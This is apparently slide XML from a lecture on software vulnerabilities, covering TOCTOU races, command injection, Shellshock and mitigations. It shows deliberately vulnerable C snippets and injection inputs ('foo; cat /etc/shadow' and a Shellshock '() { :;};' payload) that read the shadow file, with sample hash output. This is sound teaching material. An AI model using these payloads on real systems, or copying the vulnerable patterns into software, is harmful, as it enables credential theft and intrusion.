              <a:t>CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="901291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t>TOCTTOU Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The access() system call returns an estimation of the access rights of the user specified by the real UID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The open() system call is executed using the effective UID</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>access(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, W_OK) == 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	if ((</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>open(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, O_WRONLY)) &lt; 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>perror(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>		return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>write(fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3114230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09B8-8EEA-1F80-A686-1D6468539ACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: CVE-2024-7348</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer error&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8A55AF5-E4C3-4DF8-D65C-E38B43E1DC80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1395663" y="1158251"/>
            <a:ext cx="5764887" cy="3779270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2918198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t>Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use versions of system calls that use file descriptors instead of file path names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform file descriptor binding first</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For temp files, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mkstemp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), which creates a file AND opens it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1616710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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417797" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications invoke external commands to carry out specific tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system(&lt;string&gt;) executes a command specified in a string by calling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="838200" lvl="1" indent="-381000"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -c &lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() opens a process by creating a pipe, forking, and invoking the shell as in system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the user can control the string passed to these functions, it can inject additional commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83661803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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char cmd[1024];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>snprintf(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, 1024, "cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>var/log/%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>", argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  cmd[1023] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system(cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> “foo; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/shadow”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/log/foo: file not found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>root:$1$LtWqGee9$jLrc8CWVMx6oAA8WKzS5Z1:16661:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>:*:16652:0:99999:7:::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="4800600"/>
            <a:ext cx="685800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BD5F6748-727B-F942-A49F-96C7BB40957B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32984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Example: Shellshock</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In September 2014, a new bug in how bash processes its environment variables was disclosed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE-2014-6271</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The bug was present since version 1.03, released in 1989</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The bash program can pass its environment to other instances of bash, including one or more function definitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is accomplished by setting environment variables whose value start with ‘()’ followed by a function definition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function definition is then executed by the new interpreter to create the function  	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190742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Design/Logic Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are flaws in the overall logic of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of authentication and/or authorization checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Erroneous trust assumptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are the most difficult to identify automatically because they require a clear understanding of the functionality implemented by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2457297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Example: Shellshock</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By appending commands to the function definition, it is possible to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: If a user has access to a limited-access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account he/she can break out of the restricted shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a command that is not the allowed one is requested, the original command is put in the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$SSH_ORIGINAL_COMMAND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By passing as a command the string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>() { :;}; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The command will be put in the environment variable and interpreted, resulting in the injected command execution </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1434310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en-US"/>
              <a:t>Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1007619" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection can happen whenever execution using user-supplied data is triggered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input from the user should always be sanitized </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoking commands with system() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() is dangerous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="746160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B2A4-0AB2-8531-A6FA-6B198E074637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F8E7005-FDD7-14B8-7536-01BBCA2E866C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improper use of cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leftover debug capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improper error handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hardcoded secrets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inherited file descriptors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1488014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AE5D-43D8-DF7B-2C16-6553DD89D516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary Targets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DA178BF-DD1A-4E6F-4DD8-A979F7891F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2924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en-US" dirty="0"/>
              <a:t>The ELF File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="994307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
